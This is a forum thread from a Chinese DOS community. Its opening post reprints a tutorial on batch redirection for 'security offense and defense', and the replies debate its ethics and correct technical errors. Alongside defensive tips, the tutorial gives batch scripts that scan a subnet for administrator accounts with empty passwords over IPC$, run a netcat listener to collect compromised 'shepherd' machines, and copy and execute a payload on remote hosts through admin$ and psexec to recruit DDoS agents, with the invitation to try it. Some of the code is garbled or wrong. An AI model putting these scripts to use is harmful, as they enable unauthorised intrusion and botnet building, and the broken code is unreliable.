China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

中国DOS联盟论坛
The time now is 2026-07-07 15:24
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » The application of redirection commands in security offense and defense View 6,984 Replies 32
Original Poster Posted 2005-11-02 21:02 ·  中国 广东 广州 白云区 电信
荣誉版主
★★★
Credits 718
Posts 313
Joined 2005-09-26 00:00
20-year member
UID 42844
Gender Male
Status Offline
===================;
The following is reprinted from www.bluedon.com
===================;

Application of Redirection Commands in Security Offense and Defense



Everyone knows that there is a command not commonly used under DOS - the redirection command. This little thing is very useful. This command can also be used under Win9x/ME/2000/XP. Flexibly using this command can bring great convenience to us - it will bring great convenience whether for intrusion, defense, or system application. Today let's take a look at several application examples of redirection commands in security.

  I. Command Format

  The standard input and output under DOS are usually carried out on the standard devices keyboard and display. Using redirection, the input and output can be conveniently redirected to disk files or other devices. Among them:

  1. The greater-than sign ">" sends the command to a file or device, for example, printer>prn. When using the greater-than sign ">", some command outputs (such as error messages) cannot be redirected.

  2. The double greater-than sign ">>" appends the command output to the end of the file without deleting the existing information in the file.

  3. The less-than sign "<" obtains the input required by the command from a file instead of the keyboard.

  4. The >& symbol redirects the output from one default I/O stream (stdout, stdin, stderr) to another default I/O stream. For example, command >output_file 2>&1 redirects all error messages during the command process from the screen to the standard file output. The values of the standard output are as follows:

  Standard output Equivalent value

  Stdin 0

  Stdout 1

  Stderr 2

  Among them, 1 and 2 both create a file to store data; 4 may not be usable under DOS.

  II. Output of Redirection Commands

  Almost all commands send output to the screen. Even commands that send output to a drive or printer will display messages and prompts on the screen. To redirect output from the screen to a file or printer, use the greater-than sign (>). The greater-than sign can be used in most commands. For example, in the following command, the directory list generated by the dir command is redirected to the Dirlist.txt file: dir>dirlist.txt. If the Dirlist.txt file does not exist, the system will create it. If Dirlist.txt exists, the system will replace the information in the file with the output of the dir command.

  To append the command output to the end of the file without losing any information in the file, use the double greater-than sign (>>). For example, in the following command, the directory list generated by the dir command is appended to the Dirlist.txt file: dir>dirlist.txt. To redirect input to a command, just as you can send command output to a file or printer instead of the screen, you can obtain the input of the command from a file instead of the keyboard. To obtain input from a file, use the less-than sign (<). For example, the following command will obtain the input of the sort command from the List.txt file: sort

  III. Application Examples

  1. Locking/Unlocking the Registry

  Everyone knows that if the DWORD value "Disableregistrytools" in the branch HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\sys_tem (remove "_") is "1", the registry can be locked, so others cannot use the registry editor. Using the redirection command under DOS, the registry can be locked/unlocked, which is very convenient.

  Open the Notepad program, create a new text file, and enter the following content:

  @echo REGEDIT4>>123.reg
  @echo.>>123.reg
  @echo >>123.reg
  @echo "DisableRegistryTools"=dword:00000001>>123.reg
  @REGEDIT /S /C 123.reg
  @deltree /y 123.reg

  Save it as a batch file with the.bat extension, and clicking this file will lock the registry!

  In the above command, echo is the echo command under DOS. Adding the "@" prefix character in front of it means that this line will not be displayed in the command line or DOS when executed. If you want to see the execution process of the program, remove the "@". When writing the above code, you should pay attention that "REGEDIT4" in the first line must be in uppercase letters, and there is no space between "echo" and "." in the second line. The content generated by ">>" will be appended to the file behind it. Adding deltree /y 123.reg at the last line of the file can delete the 123.reg file without confirmation.

  To unlock the registry, you can edit this batch file. Just change "DisableRegistryTools"=dword:00000001 to "DisableRegistryTools"=dword:00000000, keep other content unchanged, save it as a.bat file, and clicking it will unlock the registry.

  2. Recording the IP of Machines Logging in to 3389

  Save the following content as 3389IP.bat:
  time /t >>log.log
  netstat -n -p tcp |find ":3389">>Log.log
  start Explorer

  Run 3389IP.bat, and then view the log.log file to see the IP of the machine logging in to 3389. Isn't it very convenient?

  3. Restoring DOS Real Mode

  Everyone knows that some malicious web pages will modify the registry of the viewer. Among various means, modifying the registry to make DOS real mode unavailable is one of the tricks. There are many ways to restore DOS real mode. Using a batch file combined with the redirection command is a relatively special trick, which is shared with you here.

  echo off
  echo REGEDIT4>c:\scanreg.reg
  @echo.>>lock.reg
  echo >>c:\scanreg.reg
  echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
  regedit /s c:\scanreg.reg
  @del c:\scanreg.reg

  Save it as a batch file with the.bat extension, and clicking this file will restore DOS real mode, and those DOS applications can be used again.

  4. Waiting for the Shepherd Machine to Come

  Is it very hard to find the shepherd machine every day? Using the redirection command and the batch file can let you find the shepherd machine simply! The method is to create a new text file with Notepad and enter the following content:

  @echo off
  :start
  nc -vv -w 5 -l -p 80>>rouji.log
  goto start

  Save it as a.bat file (you need to prepare an nc.exe file in advance, which is the main program of the network fault event detection software Netcat), and then after running this program, you just wait for the shepherd machine to come to you actively! If you are lucky, 10 per day is not a problem.

  5. Quick Empty Connection

  An empty connection is a session established with the server without trust, in other words, it is an anonymous access to the server. Using the command net use \IP\ipc$ "" /user:"" can simply establish an empty connection with the target (requires the target to open IPC$). Using the redirection command and the for command can quickly make empty connections to a Class C network segment and save the results in a file for your analysis. The method is to edit a file with the following content with Notepad:

  @echo off
  echo 格式:test *.*.*>test.txt
  for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt

  Save the batch file as.bat and run it. The function of this batch file is to sequentially try to establish an ipc$ connection with the account administrator and empty password for the 254 ips in the specified Class C network segment. If successful, the result will be recorded in test.txt. This realizes the NT weak password scanning function! Among them, the function of the for command is to execute a specific command for each file in a group of files, that is, a series of commands can be generated with the specified loop range. The format of the For command is: FOR %variable IN (set) DO command , and the specific meaning:

  %variable: Specify a single letter replaceable parameter.

  (set): Specify one or a group of files. Wildcards can be used.

  command: Specify the command to be executed for each file.

  command-parameters: Specify parameters or command line switches for a specific command.

  When using the FOR command in the batch file, use %%variable instead of %variable when specifying the variable. The variable name is case-sensitive, so %i is different from %I.

  6. Forbidding Empty Connection

  The existence of empty connections has certain dangers, so it is better to forbid it! The method is to enter net share to view the local shared resources, and then enter the following commands to delete the shares:

  net share ipc$ /delete
  net share admin$ /delete
  net share c$ /delete
  net share d$ /delete (if there are drives such as e, f, etc., they can be deleted in the same way)

  Then create a new text file with Notepad and enter the following content:

  @echo REGEDIT4>>123.reg
  @echo.>>123.reg
  @echo >>123.reg
  @echo "RestrictAnonymous"=dword:00000001>>123.reg
  @REGEDIT /S /C 123.reg
  @deltree /y 123.reg

  Save it as a batch file with the.bat extension, and clicking this file will forbid the empty connection.

  7. Scanning All Computers Connected to This Machine with TCP Protocol

  Scanning the ports of your own computer, finding that special ports are open, can check for trojans. Moreover, using the following batch file can also record the IP addresses of all computers connected to this machine with TCP protocol. The content of this.bat file is as follows:

  data /t>>123.log
  time /t>>123.log
  netstat -n -p tcp 10>>123.log

  In this way, not only the IP of the other party can be recorded, but also the time and date, which is convenient for you to view.

  8. Automatically Obtaining DDoS Shepherd Machines

  DDoS is the abbreviation of Distributed Denial of Service, which means distributed denial of service attack. It refers to using client/server technology to combine multiple computers as attack platforms to launch DoS attacks on one or more targets, thereby multiplying the power of denial of service attacks. Usually, the attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program will communicate with a large number of agent programs, which have been installed on many computers on the Internet. When the agent program receives the instruction, it launches the attack. Using client/server technology, the master program can activate the operation of hundreds or thousands of agent programs in a few seconds.

  Although it is not recommended to use DDoS to attack, it is necessary to master the technology. But how to obtain the shepherd machines for DDoS attack? Saving the following content as the ok.bat file can achieve the purpose:

  @echo off
  echo Automatically Obtain DDoS Shepherd Machines
  for /f "tokens=1,3*" %i in (host.txt) do net use \%k\ipc$ /user:"%j"
  copy %1 \%i\admin$\sysytem32
  if errorelevel 0 goto success
  psexec -d \%i c:\winnt\sys_tem(remove "_")32%1
  net user \%i\ipc$ /del
  :success
  echo ------------------------------>>success.txt
  echo Shepherd Machine:%i>>success.txt
  echo Username:%j>>success.txt
  echo Password:%k>>success.txt
  echo ------------------------------>>success.txt

  The usage method is ok.bat *.exe host.txt, where the format of host.txt is: ip administrator password. Okay, give it a try. But don't use it for destruction.

  In fact, the method mentioned in this article mainly uses batch files and related commands. The redirection command is just a "connector" playing a connecting role in it, but its contribution is also great, so we should not forget the redirection command.
Floor 2 Posted 2005-11-02 21:22 ·  中国 辽宁 朝阳 联通
铂金会员
★★★★
痴迷DOS者
Credits 5,798
Posts 1,924
Joined 2003-06-20 00:00
23-year member
UID 5583
Gender Male
From 金獅電腦軟體工作室
Status Offline


Good stuff written, it is recommended that everyone take a look.
熟能生巧,巧能生精,一艺不精,终生无成,精亦求精,始有所成,臻于完美,永无止境!
金狮電腦軟體工作室愿竭诚为您服务!
QQ群:8393170(定期清理不发言者)
个人网站:http://www.520269.cn
电子邮件:doujiehui@vip.qq.com
微信公众号: doujiehui
Floor 3 Posted 2005-11-02 21:44 ·  中国 山东 济南 移动
钻石会员
★★★★★
Credits 10,046
Posts 3,039
Joined 2002-11-11 00:00
23-year member
UID 223
Gender Male
Status Offline
DOS is not for this. Doubt the morality of the original poster of this post.
简单就是美
Floor 4 Posted 2005-11-02 21:50 ·  中国 广东 广州 白云区 电信
荣誉版主
★★★
Credits 718
Posts 313
Joined 2005-09-26 00:00
20-year member
UID 42844
Gender Male
Status Offline
It is suggested that everyone enriches more in our forum and contributes their own experiences to novices. Especially willsort — he is very good at batch processing, usually explains very clearly and patiently, and constantly explores and corrects, pointing out his own understanding and analysis errors. (I'm starting to get a bit of his way of thinking, ha. Just kidding!)

Remember, in "How to Become a Hacker" it is said:

The most effective way to become a master is to learn the spirit of masters; not just to learn knowledge and emotions.

(I have no intention of not respecting other hardworking forum moderators, gold and silver medal members and experts. It's just that willsort's replies are really not just a few words, which makes me know him better. Please don't think too much!)

[ Last edited by 220110 on 2005-11-2 at 22:03 ]
Floor 5 Posted 2005-11-02 21:57 ·  中国 广东 广州 白云区 电信
荣誉版主
★★★
Credits 718
Posts 313
Joined 2005-09-26 00:00
20-year member
UID 42844
Gender Male
Status Offline
Originally posted by Michael at 2005-11-2 21:44:
DOS is not for this. Doubt the ethics of the original poster of this thread.



You're overthinking. What I want to spread is technology and to enrich our forum.

[ Last edited by 220110 on 2005-11-2 at 22:09 ]
Floor 6 Posted 2005-11-02 22:30 ·  中国 山东 济南 移动
钻石会员
★★★★★
Credits 10,046
Posts 3,039
Joined 2002-11-11 00:00
23-year member
UID 223
Gender Male
Status Offline
The building owner has worked hard. Thanks for the owner's enthusiasm. But I think this article reveals the original author's voyeuristic desire to a certain extent. Hehe.
简单就是美
Floor 7 Posted 2005-11-03 07:50 ·  中国 广东 广州 白云区 电信
荣誉版主
★★★
Credits 718
Posts 313
Joined 2005-09-26 00:00
20-year member
UID 42844
Gender Male
Status Offline
1, I laugh at those who are ridiculous, stirring up such needless disputes;
2, Just say it, I am willing to "admit" everything everyone says, but please end this thread immediately and ask wengier to delete it as soon as possible (including reprinted articles);
3, I will continue to "peek" and switch to lurking "peeking", and leave when I have learned something;
4, To michael: I don't know if you were in a bad mood last night, but please remember your postscript: "Simple is beauty".
Floor 8 Posted 2005-11-03 18:32 ·  中国 山东 济南 移动
钻石会员
★★★★★
Credits 10,046
Posts 3,039
Joined 2002-11-11 00:00
23-year member
UID 223
Gender Male
Status Offline
to 220110:
Dude, you're really fired up. I emphasized so much that it's the "original author" not the thread starter, and yet you still misunderstood. I'm really sorry.
But when I saw things like "waiting for the zombie computer to come to the door" and "DDOS attacking others", I feel that the "original author" of this article is disgusting.
As for the "voyeuristic desire" I mentioned, it's definitely about the "original author" of this article. I don't know if you don't understand or deliberately don't understand.

Once again, I apologize to 220110. I'm sorry.

PS: I was really in a bad mood last night because a server I made was attacked by boring people last weekend, which almost had serious consequences.
简单就是美
Floor 9 Posted 2005-11-03 19:32 ·  中国 广东 广州 白云区 电信
荣誉版主
★★★
Credits 718
Posts 313
Joined 2005-09-26 00:00
20-year member
UID 42844
Gender Male
Status Offline
It's because you said in the 3rd floor that "the original author of this post" is not "the original author of this article", plus due to the changeable weather in Guangzhou leading to a cold, my head was a little dizzy for a while... The junior makes a bow here to apologize and beg for your understanding.

In addition, I would like to say more. No matter who it is, no matter whether it's good or bad, as an influential public figure, one should not easily make vague remarks.

Wish you happiness and all your wishes come true.
Floor 10 Posted 2005-11-03 19:49 ·  中国 山东 济南 移动
钻石会员
★★★★★
Credits 10,046
Posts 3,039
Joined 2002-11-11 00:00
23-year member
UID 223
Gender Male
Status Offline
Haha, it turned out to be a typo on my part. This matter is settled...........
简单就是美
Floor 11 Posted 2005-11-03 22:58 ·  中国 广东 广州 番禺区 电信
金牌会员
★★★★
D◎$ Fαп
Credits 4,562
Posts 1,883
Joined 2004-01-19 00:00
22-year member
UID 15812
Gender Male
From 广东广州
Status Offline
Originally posted by 220110 at 2005-11-3 19:32:
Due to the changeable weather in Guangzhou causing a cold, my head is dizzy for a while...

Hehe, so you are also from Guangzhou? I have a cold now too, dizzy~~~~~
----====≡≡≡≡ 我的至爱,永远是MSDOS!≡≡≡≡====----
Floor 12 Posted 2005-11-07 18:47 ·  中国 山西 运城 中移铁通
元老会员
★★★★
Batchinger
Credits 4,432
Posts 1,512
Joined 2002-10-18 00:00
23-year member
UID 19
Gender Male
Status Offline
To All:

I briefly browsed the first post and had some feelings, so I wrote this article. To avoid causing misunderstandings again, I would like to state specifically: This article only targets the original content in the first post, and does not target the original author and the re-posters of the original text! As for the controversies and discussions it has triggered in the moral field, I have some insights and may write about them in my blog in this forum in the future, which will not be elaborated here.

The first and second sections of this article mainly talk about redirection, and the third section mainly talks about attacks and defenses. Regarding the content in the first and second sections, the exposition is basically clear and understandable, but there are also certain omissions.

First of all, redirection is not a "command", but a set of functional characteristics unique to the command line. Because it has no command entry in COMMAND.COM and no support from external programs; we can call it "redirection characteristics", or "redirection functions", or we can also refer to the mark symbols representing these functional characteristics alone as "redirection symbols" (referring to >, >> <).

Secondly, the exposition of redirection output in the second section also includes redirection input ("<").

Thirdly, regarding the content of ">&", this article does not specify that it is a characteristic unique to the command line environment of Windows NT/2000/XP/2003 and other NT series operating systems (referred to as NT CMD), rather than a characteristic in the usual DOS environment.

Fourthly, the pipeline characteristics closely related to redirection and the pipeline symbol (|) are not mentioned in the first and second sections, but it is applied in the third section;

The content of the third section, because it involves a field I am not familiar with, it is not convenient to comment too much; but only in terms of the application of redirection in it, it does not have too much technical value. The code in the article basically only applies some basic redirection usages, and many in-depth usages and their technical extensions are not involved.

Of course, I do not generally deny the inherent value of this article. After all, it is also the fruit of the original author's hard work. As a tutorial for beginners, it still has its positive significance.

In addition, I am very happy to see that brothers 220110 and Michael have resolved their misunderstandings!

[ Last edited by willsort on 2005-11-7 at 19:51 ]
※ Batchinger 致 Bat Fans:请访问 批处理编程的异类 ,欢迎交流与共享批处理编程心得!
Floor 13 Posted 2006-10-21 06:38 ·  中国 湖北 武汉 电信
版主
★★★★★
Credits 11,386
Posts 4,938
Joined 2006-07-23 17:10
19-year member
UID 59080
Status Offline
First, thank you to Brother willsort for the meticulous observation and wonderful comments. When reading this post, I felt the example of the practical application of the redirection operator in batch scripts. However, for a little error in this article (not targeting anyone, just for its content), I still point it out.

To add the command output to the end of the file without losing any information in the file, use the double greater than sign (>>). For example, in the following command, the directory list generated by the dir command is appended to the Dirlist.txt file: dir>dirlist.txt. Redirect input to a command. Just as you can send the command output to a file or printer instead of the screen, you can get the input of the command from a file instead of from the keyboard. To get input from a file, use the less than sign (<). For example, the following command will get the input of the sort command from the List.txt file: sort


There is an error in "dir>dirlist.txt" in this paragraph. It should be "dir>>dirlist.txt", and the last command in this paragraph seems to not be fully expressed.

In addition, there are some improper places in the text, such as the unnecessary "_" symbol added in the middle of "sys_tem". Although it has been explained later that there is no "_" here, it is still a bit annoying.
Floor 14 Posted 2007-10-05 10:34 ·  中国 浙江 宁波 电信
初级用户
Credits 87
Posts 42
Joined 2007-09-27 19:25
18-year member
UID 98424
Gender Male
Status Offline
willsort's answers are always detailed.
Floor 15 Posted 2007-10-05 13:18 ·  中国 江西 南昌 电信
中级用户
★★
Credits 245
Posts 123
Joined 2007-06-08 09:04
19-year member
UID 90636
Gender Female
Status Offline
Learning
Forum Jump: